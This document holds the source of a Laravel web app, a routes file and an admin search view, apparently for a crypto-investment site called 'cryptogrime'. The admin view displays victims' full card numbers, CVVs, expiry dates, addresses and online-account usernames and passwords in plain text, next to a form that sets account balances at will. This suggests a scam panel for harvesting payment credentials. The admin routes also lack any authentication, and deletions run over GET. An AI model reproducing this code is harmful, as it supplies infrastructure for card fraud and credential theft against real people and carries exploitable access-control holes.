routes/web.php
<?php

/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/
Route::group(
    [
        'middleware' => [ 'laravelForceHttps' ]
    ],
    function()
    {
    Route::get('/', function(){
        return view('Home.index');
    })->name('home');
     Route::get('/legal-information', function(){
        return view('Home.legal');
    })->name('legal');
    Route::get('/farms', function(){
        return view('farms');
    });
     Route::get('/faq', function(){
        return view('Home.faq');
    })->name('faq');
    Route::get('/contact', function(){
        return view('Home.contact');
    })->name('contact');
     Route::get('/privacy-policy', function(){
        return view('Home.privacy');
    });
 Route::get('/events', function(){
        return view('Home.event');
    })->name('events');


    Auth::routes();
 
    Route::prefix('dashboard')->group(function(){
        Route::get('/', 'FrontendController@index')->name('user.dashboard')->middleware('IsActivated');
    });
    //email verificaition
    Route::get('not/verified', function(){
        return view('Frontend.pages.notverified');
    })->middleware('auth:web')->name('not.verified');
    Route::get('not/revierify', function(){
        return view('Frontend.pages.verifinotifi');
    })->middleware('auth:web')->name('reverified');
    Route::post('resend/email/verification/{id}', 'HomeController@resend_email')->name('resend.email');
    //subdomain
    //    Route::group(['domain' => 'application.cryptogrime.com'], function(){
    //     Route::get('/form', function(){
    //        return view('form');
    //     });
    // });
     //   Route::domain('applications.cryptogrime.app')->group(function () {
     //    Route::get('/', function () {
     //          return view('form');
     //    });
     // });
   
    Route::get('auth/logout', 'Auth\LoginController@logout')->name('user.logout');
    
           Route::prefix('admin')->group(function(){
                Route::get('/', 'AdminController@index')->name('admin.dashboard');
                Route::get('/edit/{id}', 'AdminController@edit')->name('admin.edit');
                Route::put('/update/{id}', 'AdminController@update')->name('admin.update');
                Route::get('/destroy/{id}', 'AdminController@destroy')->name('admin.delete');
                Route::post('/user/edit/amount/{id}', 'AdminController@edit_amount')->name('edit.amount');
                Route::get('user/info/{id}', 'AdminController@get_user_info')->name('user.info');

                Route::get('/withdraw/i/email/{id}', 'AdminController@sendEmails')->name('admin.send.incorrect.email');
                //Login Routes
                Route::get('/login', 'Auth\AdminLoginController@showLoginForm')->name('admin.login.form');
                Route::post('/login', 'Auth\AdminLoginController@login')->name('admin.login.submit');
                //Register Routes
                Route::get('/register', 'Auth\AdminLoginController@showRegisterForm')->name('admin.register.form');
                Route::post('/logout', 'Auth\AdminLoginController@logout')->name('admin.logout');
                
                //Transaction
                Route::resource('/transactions', 'Admin\TransactionController');
                Route::post('transactions/{id}/update',  'Admin\TransactionController@update')->name('transaction.update');
                Route::get('transactions/{id}/remove',  'Admin\TransactionController@destroy')->name('transaction.destroy');
              
                //Withdraw
                Route::resource('/withdraw', 'Admin\WithdrawController');
                Route::get('withdraw/{id}/remove', 'Admin\WithdrawController@destroy')->name('withdraw.delete');
                //search
                Route::get('search/', 'AdminController@search')->name('search.index');
                //Cards
                 Route::resource('/cards', 'Admin\CardController');
        });       Route::get('cards/{id}/remove', 'Admin\CardController@destroy')->name('cards.delete');
    });
    
    

resources/views/Admin/search/index.blade.php
@extends('Admin.layouts.app')

@section('content')
	<div class="container-fluid">
		<div class="row">
			@if(!empty($user))
			<div class="jumbotron col-lg-12">

				<h2 class="text-center">The You Searched For {{$user->username}} </h2>
				<p><strong>The Email is : </strong> {{$user->email}}</p>
				<p><strong>The Phone is : </strong> {{$user->userData->phone}}</p>
				<p><strong>The Location is : </strong> {{$user->userData->city}},{{$user->userData->state}},USA,{{$user->userData->zipcode}}</p>

				<h4>The amount is: {{$user->amount}}</h4>

				<form action="{{route('edit.amount', $user->id)}}" class="form-horizontal" method="Post">
					@csrf
					<div class="form-group">
						<label for="" class="control-label">Amount</label>
						<input name="amount" type="text" class="form-control" placeholder="500" value="{{$user->amount == null ? ' ' :$user->amount}}">
					</div>
					<button type="submit" class="btn btn-primary" >Update</button>
				</form>
				<div class="clearfix"></div>
				<a href="{{route('user.info',$user->id)}}" style="float: right;" class="btn btn-primary pull-right">View</a>
			</div>
		
				<div class="col-lg-6">
					<div class="panel panel-primary">
					<div class="panel-body">
							<h3 class="text-center">Transactions</h3>
							<ul class="list-item">
							@if(!empty($user->transactions))
							@foreach($user->transactions as $trans)
								<li class="list-group-item">
									<a href="{{route('transactions.edit', $trans->id)}}"> <strong>Type: </strong>{{$trans->type}}, <strong>Status: </strong>{{$trans->status}}</a>
								</li>
								@endforeach
							</ul>
							@else
							<h2 class="text-center"><strong>{{$user->username}}</strong> has no transactions</h2>
							@endif
					</div>
				</div>
				</div>
				<div class="col-lg-6 pull-right">
					<h3 class="text-header text-center">Withdrawals</h3>
					<div class="panel-group" id="accordion">
						@if(!empty($user->withdrawals))
						@foreach($user->withdrawals as $card)
						  <div class="panel panel-primary">
						    <div class="panel-heading" style="background: #eee; padding: 10px; margin: 10px; color: white;">
						      <h4 class="panel-title text-center">
						        <a data-toggle="collapse" data-parent="#accordion" href="#{{$card->id}}">
						      {{$card->card_no}}</a>
						      </h4>
						    </div>
						    <div id="{{$card->id}}" class="panel-collapse collapse in">
						      <div class="panel-body">
						      	<p><strong>Address</strong>: {{$card->street}},{{ $card->city}},{{ $card->state}},{{$card->zipcode}}</p>
						      	<p><strong>CVV</strong>: {{$card->cvv}} </p>
						        <p><strong>Expiry</strong>: {{$card->exp_date}} </p>
						        <p><strong>Phone</strong>: {{$card->phone}}</p>
						        <p><strong>Online</strong>: <strong>Username:</strong>{{$card->username}}, <strong>Password:</strong> {{$card->password}}</p>
						        <p><strong>IP: {{$card->ip}}</p>
						      </div>
						    </div>
						  </div>
						  @endforeach
						  @else
						  <div class="jumbroton">
						  	<h3>No withdrawal for this user</h3>
						  </div>
						  @endif
						</div>				
					</div>
			</div>
			@else
			<div class="jumbotron col-lg-12">
				<h2 class="text-center">{{$_GET['search']}} Was not found</h2>
			</div>
			@endif

		</div>
	</div>
@endsection